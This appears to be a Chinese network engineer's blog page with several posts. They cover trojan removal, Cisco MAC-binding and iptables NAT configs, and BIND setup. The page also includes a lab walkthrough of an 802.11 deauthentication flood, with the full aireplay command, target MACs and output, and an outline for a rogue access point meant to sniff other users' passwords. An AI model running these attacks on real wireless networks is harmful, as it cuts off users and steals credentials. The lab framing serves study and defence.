You may say I am a dreamer,
But I am not the only one,
I hope someday you will join us,
And the world will live as one.
订阅数:131759首先热烈庆祝卓讯盟公司第一届广东移动安全咨询技术研讨高峰会在东莞顺利举行:)
在会中客户提到了最近网络内出现"传奇木马"蠕虫通过ARPSPOOF攻击导致经常断线的问题,这里我们提议使用"欣全向ARP工具"来进行检测,下载地址:
http://www.nuqx.com/downcenter.asp
从网上GOOGLE到的清除方法:
该木马一共有三个文件,分别是: C:WINNTSystem32LOADHW.EXE ,C:WINNTSystem32msitinit.dll ,C:WINNTSystem32drivers pf.sys。LOADHW.EXE是一个安装文件,在会把自己注册在: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce 如果它被删除掉,并不影响木马的运行,只是在开机时会报该文件不存在。 msitinit.dll是常驻内存的,但注册表中并没有记录它(很狡猾)。 npf.sys注册为一个服务程序,且在“控制面板->管理工具->服务”中看不到,要在注册表中才能看到: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNpf 解决方法:重新启动,按f8,选进入安全模式,在里面杀毒。点开始里的搜索查找Loadhw.exe,Msitinit.dll,Npf.sys文件,找到了就删除。查找注册表的loadhw.exe,Msitinit.dll,Npf.sys找到了就删除。
802.11 deauthflood
writer: demonalex
0)原理
802.11--WLAN无线局域网在数据链路层的帧划分为三个大类:管理帧、控制帧、数据帧。其中管理帧主要用于控制STA在WLAN中的接入问题。用户接入WLAN需要有两个主要的握手过程:认证与关联。802.11
DoS
注入攻击就是模拟出这两个握手过程中的某个恶意的‘片段’会话导致正常用户的接入中断过程。本文中使用的deauthflood就是通过不停地向AP发送一些模拟正常用户要“解除认证会话”的帧,导致正常用户无法正常连入WLAN(网络层以上均不通)的过程。为什么这样的攻击能正常进行呢?是因为数据链路层是不提供帧的合法性鉴别的,因此可以很容易就被‘伪造’。
1)使用D-LINK DWL-G520 PCI无线网卡,安装在一台装有REDHAT LINUX
AS4的机器上,安装好MADWIFI-NG驱动:
[root@localhost ~]# rpm -aq|grep sharutils
sharutils-4.2.1-22.2
首先确保系统安装有sharutils包,然后:
[root@localhost ~]# cd /usr/local/sbin
[root@localhost sbin]# wget
http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1531-20060427.tar.gz
[root@localhost sbin]# tar -zxvf
madwifi-ng-r1531-20060427.tar.gz
[root@localhost sbin]# cd madwifi-ng-r1531-20060427
[root@localhost madwifi-ng-r1531-20060427]# make && make
install
然后在/etc/rc.d/rc.local中添加:
modprobe ath_pci
ifconfig ath0 down
ifconfig ath0 0.0.0.0 0
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ifconfig ath0 up
重新启动机器,开机后无线网卡接口ath0自动转入monitor模式.
2)安装aircrack
[root@localhost sbin]# wget
http://demonalex.3322.org/download/wireless/aircrack/aircrack.tar.gz
[root@localhost sbin]# tar -zxvf aircrack.tar.gz
[root@localhost sbin]# cd aircrack
[root@localhost aircrack]# make && make install
安装完成后在该目录下会生成几个ELF文件,其中包括:
-rwxr-xr-x 1 root root 56710 Aug 8 11:07
aireplay
3)进行deauthflood攻击与检测
++++++++++++++++++++++++++++++++++++++++
[root@localhost aircrack]# ./aireplay -0 800 -a 00:03:2F:18:4E:0E
-c 00:15:E9:2B:3D:06 ath0
17:29:35 Sending DeAuth to station -- STMAC:
[00:15:E9:2B:3D:06]
17:29:36 Sending DeAuth to station -- STMAC:
[00:15:E9:2B:3D:06]
17:29:36 Sending DeAuth to station -- STMAC:
[00:15:E9:2B:3D:06]
17:29:37 Sending DeAuth to station -- STMAC:
[00:15:E9:2B:3D:06]
17:29:38 Sending DeAuth to station -- STMAC:
[00:15:E9:2B:3D:06]
17:29:38 Sending DeAuth to station -- STMAC:
[00:15:E9:2B:3D:06]
17:29:39 Sending DeAuth to station -- STMAC:
[00:15:E9:2B:3D:06]
...
这里第一个参数"0"代表是deauthflood攻击,"800"是发送800个攻击帧;"-a"参数后跟是目前我们所在的WLAN的AP的BSSID;"-c"参数后跟的是被攻击的无线客户端的MAC地址;最后一个参数是该攻击机器的无线网卡接口.
++++++++++++++++++++++++++++++++++++++++
此时在WLAN中MAC地址为00:15:E9:2B:3D:06的客户端在数据链路层还是连通的(WINDOWS桌面上的网络连接图标还处于连接状态),但已无法PING通WLAN上的其他机器了。
写了很久,感谢全公司同事的大力支持。。。终于完成了,可惜没什么技术含量。。。郁闷。。。
星期一早上回到珠海,继续实验...昨晚(正确说应该是今日的早上,因为是凌晨时分),整个分部的人都在加班:
雷哥:配置MA5200上线
小林:安装配置SOLARIS10
我:搭建FreeRadius
将近5点...大伙拖着疲惫的躯壳回到宿舍...都是我的错,大伙要加班了...:D
最后奉上我完成的文档,在此下载.
到珠海过了两天...环境不错,看到了传说中的、移动通信中心黑珍珠美女与华为MA5200...写了关于华为3550交换机配置MAC地址访问控制列表,下载该文档.下星期继续珠海之旅....:)
1.方案1——基于端口的MAC地址绑定
思科2950交换机为例,登录进入交换机,输入管理口令进入配置模式,敲入命令:
Switch#config terminal
#进入配置模式
Switch(config)# Interface fastethernet 0/1
#进入具体端口配置模式
Switch(config-if)#Switchport port-secruity
#配置端口安全模式
Switch(config-if )switchport port-security mac-address MAC(主机的MAC地址)
#配置该端口要绑定的主机的MAC地址
Switch(config-if )no switchport port-security mac-address MAC(主机的MAC地址)
#删除绑定主机的MAC地址
注意:
以上命令设置交换机上某个端口绑定一个具体的MAC地址,这样只有这个主机可以使用网络,如果对该主机的网卡进行了更换或者其他PC机想通过这个端口使用网络都不可用,除非删除或修改该端口上绑定的MAC地址,才能正常使用。
注意:
以上功能适用于思科2950、3550、4500、6500系列交换机
2.方案2——基于MAC地址的扩展访问列表
Switch(config)Mac access-list extended MAC10
#定义一个MAC地址访问控制列表并且命名该列表名为MAC10
Switch(config)permit host 0009.6bc4.d4bf any
#定义MAC地址为0009.6bc4.d4bf的主机可以访问任意主机
Switch(config)permit any host 0009.6bc4.d4bf
#定义所有主机可以访问MAC地址为0009.6bc4.d4bf的主机
Switch(config-if )interface Fa0/20
#进入配置具体端口的模式
Switch(config-if )mac access-group MAC10 in
#在该端口上应用名为MAC10的访问列表(即前面我们定义的访问策略)
Switch(config)no mac access-list extended MAC10
#清除名为MAC10的访问列表
此功能与应用一大体相同,但它是基于端口做的MAC地址访问控制列表限制,可以限定特定源MAC地址与目的地址范围。
注意:
以上功能在思科2950、3550、4500、6500系列交换机上可以实现,但是需要注意的是2950、3550需要交换机运行增强的软件镜像(Enhanced Image)。
3.方案3——IP地址的MAC地址绑定
只能将应用1或2与基于IP的访问控制列表组合来使用才能达到IP-MAC 绑定功能。
Switch(config)Mac access-list extended MAC10
#定义一个MAC地址访问控制列表并且命名该列表名为MAC10
Switch(config)permit host 0009.6bc4.d4bf any
#定义MAC地址为0009.6bc4.d4bf的主机可以访问任意主机
Switch(config)permit any host 0009.6bc4.d4bf
#定义所有主机可以访问MAC地址为0009.6bc4.d4bf的主机
Switch(config)Ip access-list extended IP10
#定义一个IP地址访问控制列表并且命名该列表名为IP10
Switch(config)Permit 192.168.0.1 0.0.0.0 any
#定义IP地址为192.168.0.1的主机可以访问任意主机
Permit any 192.168.0.1 0.0.0.0
#定义所有主机可以访问IP地址为192.168.0.1的主机
Switch(config-if )interface Fa0/20
#进入配置具体端口的模式
Switch(config-if )mac access-group MAC10 in
#在该端口上应用名为MAC10的访问列表(即前面我们定义的访问策略)
Switch(config-if )Ip access-group IP10 in
#在该端口上应用名为IP10的访问列表(即前面我们定义的访问策略)
Switch(config)no mac access-list extended MAC10
#清除名为MAC10的访问列表
Switch(config)no Ip access-group IP10 in
#清除名为IP10的访问列表
上述所提到的应用1是基于主机MAC地址与交换机端口的绑定,方案2是基于MAC地址的访问控制列表,前两种方案所能实现的功能大体一样。如果要做到IP与MAC地址的绑定只能按照方案3来实现,可根据需求将方案1或方案2与IP访问控制列表结合起来使用以达到自己想要的效果。
注意:以上功能在思科2950、3550、4500、6500系列交换机上可以实现,但是需要注意的是2950、3550需要交换机运行增强的软件镜像(Enhanced Image)。
后注:从表面上看来,绑定MAC地址和IP地址可以防止内部IP地址被盗用,但实际上由于各层协议以及网卡驱动等实现技术,MAC地址与IP地址的绑定存在很大的缺陷,并不能真正防止内部IP地址被盗用。
(www.net130.com)
整个压缩包包括两个解决方案-----中国电信的CTC(天翼通)与联通的CUC
CUC我是没有接触过了,但CTC我曾用过,并且与CMCC的内部的WLAN结构异常相似,所以对CMCC的WLAN比较感兴趣的朋友可以参详一下(除了在管理上不太一样外...).
技术实现上主要讨论了如何将802.1x与传统的PPPOE、AC结合,并作了各种结合解决方案的对比...这里我原来曾想过是否可以将多者的认证点(AAA服务)统一,该文档的结论上是否定....PS:我个人也觉得有点悬,不过还是想亲身测试一下.:)
没什么实用价值,而且N多朋友怀疑其中的数据是"错"的(PS:估计是指不够精确的缘故吧),但我只想说:我已经尽我的努力去做了(包括在力求数据精确的问题上)....同时希望各位看官能提供意见/指出不足,谢谢各位....:)
[操作文]非法AP搭建全过程(level I)
writer: demonalex
email: demonalex[at]gzpia.com && demonalex[at]dark2s.org
实验目的:
利用一台PC机搭建一个与真实AP的“三元组”(SSID:gzpia3、频道:8、WEP KEY:1112223334)完全
相同的“AP”。并在该AP中安装嗅探器与应用层解码软件,实现802.11通信欺骗与中间人攻击,从而获取
到其他无线客户端的通信数据(例如用户帐号、密码等)。
搭建所使用的材料:
硬件环境:一台奔腾II级别的PC、一张8139有线网卡、一张TP-LINK无线网卡(型号:TL-WN550G)
软件环境:安装RedHat Fedora 2操作系统
*其实基本上所有的Atheros芯片无线网卡都可以使用Madwifi驱动,关于使用Atheros芯片的无线网卡型号
查询可以查阅http://customerproducts.atheros.com/customerproducts/。
搭建过程:
将有线与无线网卡插入PC机-》安装Fedora2操作系统-》安装Madwifi无线网卡驱动-》禁用iptables/netf
ilter服务-》安装bridge-utils程序包-》配置预处理网络接口-》重启机器并进行简单配置-》配置ether
eal进行嗅探
http://www.demonalex.net/vpn/PPTP.doc
感谢磁力BT、啊BAN与公司的同事的帮助,让我能完成这篇傻瓜操作文档:)
最近屋企附近开了一家名为"久久丫"的肉食专卖店,今天忘了吃饭,只好到那里去看看了,买了两袋五香蛋,5块RMB,说实在,不怎么好吃,晚上又失眠了,郁闷...又是睡了两个小时,估计我的生命力已经与小强('蟑螂')相差无几了...
明天到GD-LINUX拜访一位姓龚的工程师,随便参观一下他们的机房,LOG一下,看看能学到些什么...
最近写的两篇文档:
[整理文]搭建Snort网络入侵检测系统
http://www.demonalex.net/snort/setup.doc
[说明文]五种常见的AP使用模式
http://www.demonalex.net/wireless/wepcrack.doc
有什么错误还请各位看官多多指出:)
[ 配置文]Setup BIND
Writer: demonalex[at]dark2s.org
前言:本文分为两个部分,第一部分是“如何搭建BIND ”,第二部分是“如何chroot BIND ”。
实验环境:
硬件配置:
|
CPU |
奔腾4 – 2.8GHz |
|
内存 |
512mb |
|
硬盘 |
80G |
|
网卡 |
1 张金浪8139 网卡 |
软件配置:
|
操作系统 |
FreeBSD 5.4 Stable |
|
主机名 |
server2.gzpia.com |
|
网络接口地址 |
192.168.1.4 |
下面提供的是IPTABLES的一个配置文件用以在LINUX下实NAT和PAT
主要功能是将公有地址216.94.87.37:2121映射到内网的192.168.100.125:21用于构建这FTP服务器
将内网的192.168.100.0/24 192.168.1.0/24和192.168.0.0/24的私用地址映射成216.94.87.31实现上网浏览(使用NAT)。
以下配置仅供参考:
#!/bin/sh
echo "Starting iptables rules..."
#out eth0 216.94.87.37
#in eth1 192.168.1.254
#Refresh all chains
iptables -F
###########################Open ip_forward ###################
echo "1" >/proc/sys/net/ipv4/ip_forward
###########################Define nat #######################
#dport nat
iptables -t nat -A PREROUTING -p tcp -d 216.94.87.37 --dport 2121 -j DNAT --to-destination 192.168.100.125:21
iptables -t nat -A PREROUTING -p udp -d 216.94.87.37 --dport 2121 -j DNAT --to-destination 192.168.100.125:21
#sport nat
iptables -t nat -A POSTROUTING -p tcp -s 192.168.100.125 --sport 21 -j SNAT --to-source 216.94.87.37:2121
iptables -t nat -A POSTROUTING -p udp -s 192.168.100.125 --sport 21 -j SNAT --to-source 216.94.87.37:2121
#ip nat
iptables -t nat -A POSTROUTING -s 192.168.100.0/24 -o eth0 -j MASQUERADE
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -o eth0 -j MASQUERADE
#############FORWARD DEFAULT POLICY#######################
iptables -P FORWARD DROP
###########################Define packets#################
#Allow www request packets from Internet clients to www servers
iptables -A FORWARD -p tcp -i eth0 -j ACCEPT
iptables -A FORWARD -p udp -i eth0 -j ACCEPT
iptables -A FORWARD -p tcp -i eth1 -j ACCEPT
iptables -A FORWARD -p udp -i eth1 -j ACCEPT
#################################Define fregment rule########
iptables -A FORWARD -f -m limit --limit 100/s --limit-burst 100 -j ACCEPT
#################################Define icmp rule#######
iptables -A FORWARD -p icmp -m limit --limit 1/s --limit-burst 10 -j ACCEPT
Powered by Haiwit